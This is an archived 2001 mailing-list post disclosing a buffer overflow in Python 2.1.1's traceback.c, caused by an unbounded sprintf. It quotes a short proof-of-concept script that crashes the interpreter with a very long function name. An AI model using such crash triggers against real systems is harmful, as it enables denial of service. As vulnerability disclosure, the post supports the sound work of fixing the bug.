Vulnerability Development mailing list archives
Buffer overflow in Python code
From: Giorgio <deneb () unixwave org>
Date: Sun, 25 Nov 2001 11:31:03 +0100
Hi,
I've found buffer overflow in Python 2.1.1 source code. (Maybe there're many others)
The buffer overflow is in the file traceback.c in the directory Python of the
Python source code.
Simply there's a sprintf done in this way:
sprintf(linebuf,FMT,filename,lineno,name)
What cause the overflow is the name parameter which could be > 1000 (linebuf size)
Alex Martelli <aleax () aleax it> has submitted the bug on sourceforge as
485175, and produced the follow script to demostrate the overflow:
#!/usr/local/bin/python
name = 'prova'*200
fou = open('fatto.py','w')
print>>fou, 'def',
print>>fou, name,
print>>fou, '():'
print>>fou, ' return 1/0'
fou.close()
import fatto
print 'prima (%d)'%len(name)
funz = getattr(fatto, name)
try:
funz()
Except:
print 'beccato'
raise
which cause segmentation fault to the Python Interpreter. That bug is
present still in Python 2.0.
Cheers,
deneb.
Current thread:
- Buffer overflow in Python code Giorgio (Nov 25)
- Re: Buffer overflow in Python code Chris Ess (Nov 25)
- Re: Buffer overflow in Python code Ryan Permeh (Nov 26)
- Re: Buffer overflow in Python code Florian Weimer (Nov 26)
- Re: Buffer overflow in Python code Chris Ess (Nov 25)